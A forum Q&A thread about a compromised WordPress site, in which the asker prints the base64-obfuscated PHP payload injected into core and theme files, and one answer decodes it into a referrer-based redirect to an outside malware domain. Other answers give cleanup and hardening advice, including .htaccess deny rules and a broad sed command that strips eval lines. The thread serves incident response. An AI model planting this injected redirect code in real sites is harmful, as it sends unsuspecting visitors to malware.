WordPress Website Comprimised Hack

Question

A WordPress website we are running for a client has been comprimised and are trying to establish how they may have got in. It seems they have injected code into EVERY WP core file, all theme files and only a few select plugin files.

The code they used is:

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29zdGFicmF2YS5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));

Has anyone seen or heard of this before? And does anyone how any clues onto how this may have happened? All WP file permissions are set to the recommended levels.

Thanks for your time.

Answer 1

The most common way that I've seen this happen is when people set all of their files and folders to 777. If you have to do this for your wp-content/uploads folder, be sure that you have .htaccess directives that prevent script execution in there. Your files and folders should have the minimum permissions needed to run (files 644, folders 755).

Answer 2

You also have to go through all the instructions at these WP links to completely clean your install and prevent the code injection into either WP core or template files: See FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress and Hardening WordPress « WordPress Codex. Tell your host and change all passwords. Possibly change hosts, too; some shared hosts are more vulnerable than others.

This doesn't help all the time, because it depends on overall server and web host parameters, which on inexpensive shared hosts can leave them vulnerable, but you can try these to protect .htaccess and wp-config.php:

<Files .htaccess>
order deny,allow
deny from all
</Files>

<Files wp-config.php>
order allow,deny
deny from all
</Files>

in .htaccess.

Answer 3

I had exactly the same problem.

I guess the site was infected through the widgets, because I use one plugin wich allows PHP code to be executed.

My best solution was:

• Eliminate the suspicious widget.
• See the time and date of one infected file(my case: header.php).
• Clear all infected files(in my case I have a backup of the site).
• Search into log file for suspicious IPs at that time (search finded IPs on blacklists).
• Install one plugin to ban suspicious IPs.

From that moment the problem was gone.

Answer 4

I had this problem the other day and found sed very useful in cleaning out the rubbish. It attached itself to every opening PHP tag and often left code on the end of the line so required a bit of careful config.

I believe this is the command I used, but be careful, this is sed after all ;-)...

find . -name "*.php" -type f -exec sed -i 's/eval(.*));//' {} \;

Answer 5

So, the code below is redirecting your users to a black-listed malware site? Is that what you're experiencing?

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
            header("Location: http://costabrava.bee.pl/");
            exit();
            }
        }
    }
}

You're version of Wordpress is likely vulnerable to XSS. This link discusses it. http://www.ethicalhack3r.co.uk/security/wordpress-3-3-cross-site-scripting-xss/

What version are you on?